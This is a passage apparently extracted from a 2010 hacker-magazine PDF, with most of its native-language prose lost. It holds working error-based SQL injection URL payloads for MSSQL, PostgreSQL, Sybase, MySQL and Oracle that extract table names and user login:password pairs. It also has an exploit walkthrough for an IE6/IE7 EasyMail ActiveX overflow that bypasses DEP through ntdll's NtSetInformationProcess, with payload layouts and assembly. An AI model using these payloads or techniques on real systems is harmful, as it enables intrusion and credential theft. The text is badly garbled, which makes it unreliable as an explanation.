, "" -
:
select convert(int,@@version);
Msg 245, Level 16, State 1, Line 1
Conversion failed when converting the nvarchar
value 'Microsoft SQL Server 2008 (RTM) -
10.0.1600.22 (Intel X86)
Jul 9 2008 14:43:34
Copyright (c) 1988-2008 Microsoft
Corporation
Enterprise Edition on Windows NT 6.1
(Build 7600: ) (VM)
' to data type int.
, SQL-,
-
,
Microsoft SQL Server. ,
:
http://server/?id=(1)and(1)=(convert(i
nt,(select+table_name+from(select+row_
number()+over+(order+by+table_
name)+as+rownum,table_name+from+information_
schema.tables)+as+t+where+t.rownum=1)))--
http://server/?id=(1)and(1)=(convert(i
nt,(select+table_name+from(select+row_number()+over+(order+by+table_
name)+as+rownum,table_name+from+information_
schema.tables)+as+t+where+t.rownum=2)))--
...
, Sybase ASE, MS SQL
Server, Transact-SQL,
, -
.
(.
). MSSQL
Sybase.
.
, -
MySQL
, -
blind SQL Injection. -
PostgreSQL ""
:
web=# select cast(version() as numeric);
ERROR: invalid input syntax for type
numeric: "PostgreSQL 8.2.13 on i386-
portbld-freebsd7.2, compiled by GCC cc
(GCC) 4.2.1 20070719 [FreeBSD]"
SQL-
, :
http://server/?id=(1)and(1)=cast
((select+table_name+from+information_schema.
tables+limit+1+offset+0)+as+numeric)--
http://server/?id=(1)and(1)=cast
((select+table_name+from+information_schema.
tables+limit+1+offset+1)+as+numeric)--
...
SQL-,
warning
! -
!
, -
!
WARNING
blind SQLiMySQL
Qwazar MySQL 3.x!
7/22/2019 2010 04(135).pdf
68/148
X 04 /135/ 10
Oracle. -
,
.
, -
error-based blind SQL
Injection ,
-
XML. -
,
XMLType(),
-
(LPX-00XXX):
SQL> select XMLType((select
'abcdef' from dual)) from dual;
ERROR:
ORA-31011: XML parsing failed
ORA-19202: Error occurred in XML
processing
LPX-00210: expected '
7/22/2019 2010 04(135).pdf
69/148
X 04 /135/ 10
(ascii),
-
. ,
:
select * from table where id =
1 and(1)=(select upper(xmltype
(chr(60)||chr(58)||chr(58)||(s
elect rawtohex(login||chr(58)|
|chr(58)||password)from(select
login,password,rownum rnum from
users a)where rnum=1)||chr(62)))
from dual);
select * from table where id =
1 and(1)=(select upper(xmltype(chr(60)||chr(58)||chr(58)||(s
elect rawtohex(login||chr(58)|
|chr(58)||password)from(select
login,password,rownum rnum from
users a)where rnum=2)||chr(62)))
from dual);
...
http-
214 -
(107
hex-),
Oracle >=9.0 -
(. -):
http://server/?id=(1)and(1)=(selec
t+upper(xmltype(chr(60)||chr(58)||
chr(58)||(select+rawtohex(login||c
hr(58)||chr(58)||password)from(sel
ect+login,password,rownum+rnum+fro
m+users+a)where+rnum=1)||chr(62)))
from dual)--
SQL-
, ,
:
SQL> select utl_raw.cast_to_varch
ar2('61646D696E3A3A504073737730726
4') from dual;
UTL_RAW.CAST_TO_VARCHAR2('61646D696E3A3A5040737377307264')
admin::P@ssw0rd
SQL>
,
error-based
blind SQL Injection :
PostgreSQL, MSSQL, Sybase,
MySQL >=4.1 Oracle >=9.0.
http-, -
:
PostgreSQL: /?param=1
and(1)=cast(version() as
numeric)--
MSSQL: /?param=1
and(1)=convert(int,@@version)--
Sybase: /?param=1
and(1)=convert(int,@@version)--
MySQL>=4.1(select co
unt(*),concat(version(),0x3a,floor
(rand()*2))x from (select 1 union
select 2)a group by x limit 1)--
MySQL>=5.0: /?param=(1)and(select
1 from(select count(*),concat(v
ersion(),floor(rand(0)*2))x from
information_schema.tables groupby x)a)--
Oracle >=9.0: /?param=1
and(1)=(select upper(XMLType(ch
r(60)||chr(58)||chr(58)||(selec
t replace(banner,chr(32),chr(58))
from sys.v_$version where
rownum=1)||chr(62))) from dual)--
,
-.
, ,
SQL- .
.
, -
z !
blind SQLiSybase
blind SQLiPostgreSQL
067
blind SQLiOracle
7/22/2019 2010 04(135).pdf
70/148
Digital Security, [email protected]
068
, DEP. , . DEP
, , .
,,
.
X 04 /135/ 10
DEP HARDWARE-DEP
ActiveX
IE6/IE7,
QuickSoft EasyMail Object
,
. ,
SubmitToExpress() 256
, ESI,
SEH.
cccc260ccccAAAAffffBBBBfffffffff
fffffffffffffffffffffffDDDD
ESI = AAAA
RET = BBBB
SEH = DDDD
, heap-spray
SEH CALL [ESI+CC]
.-
, ,
DEP (Data Execution Prevention),
, -
.
ActiveX, DEP,
, ASLR (Address space
layout randomization), ,
.
.
WHO IS MISTER DEP?,
DEP, -
,
.
, DEP ,
Microsoft,
NX/XD (,
AMD NX, Intel XD)
. , -
,
.
-, EIP , -
(, ,
). ,
DEP
NX/DX Windows c -
(>= Windows XP SP2).
Microsoft -
,
software-DEP.
.-
, ,
/.
SEH.
SafeSEH,
DEP.
ACCESS VIOLATION-
, DEP?
? , -
, DEP.
,
. BIOS
,
. Intel Core2Duo , -
. , ,
software-DEP
( NX/XD ,
7/22/2019 2010 04(135).pdf
71/148
X 04 /135/ 10 069
DEP, DEP :). ,
Windows XP, DEP -
.
IE6/IE7 .
.
DEP -
. C:\boot.
ini, ,
,
,
DEP
. Front-
End
C:\boot.ini.
DEP:
/noexecute=OptIn
XP/Vista. DEP
/noexecute=OptOut
Windows Server 2003 SP1. DEP
,
.
/noexecute=AlwaysOn DEP
, .
/noexecute=AlwaysOff DEP - (
).
.
SysInternals Process Explorer
.
software-DEP OptOut, IE7 -
. ,
, SEH
, ,
,
.
.
, ,
CALL . ,
SEH
.
, (-
), CALL
[ESI+CC] ,
software-DEP.,
, ,
,
SEH- (
heap-spray.
, software-DEP,
, hardware-DEP
(NX/
XD). , , SEH
,
. -
,
, NOP
Access
violation when executing [0D0D0D0D]. -, ,
JavaScript heap-spray,
.
,
,
E Access.
DEP IS DEAD
,
DEP. ,
ret2libc.
, .
, ,
, ,
, WinExec.,
WinExec
-
! ,
,
,
-, ,
/,
/
cmd.exe ().,
.
-. , ,
--
. 2005 DEP.
,
VirtualAlloc() .
-
, -
,
,
(, ),
,
. memcpy(),
.
memcpy(), -,
.
, ,
, .
DX
DEP
7/22/2019 2010 04(135).pdf
72/148
X 04 /135/ 10
VirtualProtect()., ,
-
, VirtualProtect()
(
, 0x000040 RWX)
. -.
VirtualProtect(
IN LPVOID lpAddress,
// -
0x0D0D0D0D
IN SIZE_T dwSize,
// 0x1
IN DWORD flNewProtect,
// - 0x40
IN PDWORD lpflOldProtect// , ,
( ),
0x05050505
);
-
. Windows
API DEP? WindowsXP SP3 ()
API SetProcessDEPolicy(),
--
DEP. , -,
. .
SetProcessDEPolicy() -
NtSetInformationProcess():
NtSetInformationProcess
(
IN HANDLE ProcessHandle,
// , 0xff
IN PROCESS_INFORMATION_CLASS
ProcessInformationClass,
// 0x22
IN PVOID ProcessInformation,
//
DEP -
,
0x0000002
IN ULONG
ProcessInformationLength
// (0x4) 4
);
! , ?
Skape Skywing
ntdll.dll:
Address1:
cmp al,0x1 ; EAX=1 ?
push 0x2 ; 0x2
( )
pop esi ; ,
(0x2) ESI
je LdrpCheckNXCompatibility + 0x1a
; EAX=1
. . .
mov [ebp-0x4],esi ;
0x2( ESI) EBP-4
jmp LdrpCheckNXCompatibility +0x1d ;
. . .
; , -
0? ( -
0x2)
cmp dword ptr [ebp-0x4],0x0
jne LdrpCheckNXCompatibility+0x4d
; 4!=2,
. . .
push 0x4 ; 0x4
lea eax,[ebp-0x4] ; EAX
ebp-0x4, 0x2
Process ExplorerDEP
VirtualProtect
DEP
070
7/22/2019 2010 04(135).pdf
73/148
X 04 /135/ 10
push eax ;
0x2
push 0x22 ; 0x22
push 0xff ; 0xff (-1)
call NtSetInformationProcess
; ,
; DEP
jmp LdrpCheckNXCompatibility +
0x5c ; ...
. . .
pop esi
leave ;
ret 0x4 ; -
4
, ,
( AL)
DEP-
,
. ,
,
LEAVE ,
, , ESP = EBP. ,
EAX 1.,
,
1., -
, , AL
, ntdll.dll:
. . .Address2
mov al,0x1
ret 0x4
, :
cccc260ccccAAAAffffBBBBCCCCXXXXX
XXX100XXXXXXXXXXX
AAAA=0x05050505
BBBB=Address2
CCCC=Address1
X=0x0D
FIGHT! OllyDbg (File-
>Attach) iexplore
.code ntdll.dll
(View->Memory). -
(Ctrl+S):
al,1
retn 0x4
Address2.
Address1 :
cmp al,0x1
push 0x2
pop esi
, ,
. -
,
ESI. , ,
, CMP
[ESI+180],1. :
xor ebx, ebx ;
push -1
cmp [ESI+],EBX ; 0
CALL [ESI+CC], .
, ,
ESI+CC 0. ,
0, ret
:
call emsmtp.026c6232 ;
xor eax,eax ;
pop edi ; -
pop esi
pop ebx
leave ;
retn 0x8 ;
(AAAA)
,
,
, NOP. ESI 0x05050505, -
0 ,
,
BBBB CCCC, BBBB
retn 8. :
cccc260ccccAAAAffffBBBBffffffffC
CCCXXXXXXXX100XXXXXXXXXXX
.
,
EBP 0x4646464646 -
,
(BBBB). -
DEP,
EBP 0x2:
mov [ebp-0x4],esi
, ,
, , -
leave NtSetInformationProcess!
,
(BBBB ),
,
. , ActiveX
ASCII .
0x7C, ActiveX ? 0x3F.
,
0x7C. -
DEP,
ActiveX. ,
CALL [ESI+CC] ,
.
, , ESI+CC
,
, . ,
! CALL .
.
: CALL
DEP,
, -
. CALL
AL , ,
je LdrpCheckNXCompatibility+0x1a
DEP.
, CALL,
ActiveX,
MultiByteToWideChar(). -, Z
. ? ,
,
je.Z=1,
DEP-
071
7/22/2019 2010 04(135).pdf
74/148
X 04 /135/ 10
, . ,
CMP AL,1,
2 , , PUSH 2.
, je
DEP. ,
. :
cccc260ccccAAAAffffBBBB
AAAA = 0x05050505 ,
Address1
BBBB = 0x0D0D0D0D , -
, ,
Address1 . -
, 0x7C91CD26.
ntdll.dll.
, -
,
, DEP.
,
, .
0x0D0D0D0D ,
,
-
, ,
CALL[ESI+CC] (0x050505D1) ,
, 0x267C91CD.
, -
: 36 .
36 ,
. -
4 . ,
,
(-
,
). ,
,
, -
,
0xXXYY0000. ,
0xXXYY0024 (
+ 4 ).
0x4, +0xCC
, 0xD1.
0x3
0x05050508.
,
little-endian.
(
DVD).
-
DEP
,
.
,
-
,
, -
DEP. , ,
, Z
CALL -
,
,
,
ret2libc -
.
-
(ASLR),
VirtualProtect
NtSetInformationProcess. -
.
, IE8 DEP . , IE8
DEP (
SetProcessDEPPolicy).
DEP-
ret2libc,
NtSetInformationProcess
. -
, ,
,
BlackHat 2010 DC,
(Dionysus Blazakis) -
IE8 ASLR(-
) DEP. -
ActionScript Java,
.
JIT-spray,
z
072
NtSetInformationProcess
DEP
7/22/2019 2010 04(135).pdf
75/148
7/22/2019 2010 04(135).pdf
76/148
icq 884888
X04 /135/ 10074
: ProxFetch: *N
Top Related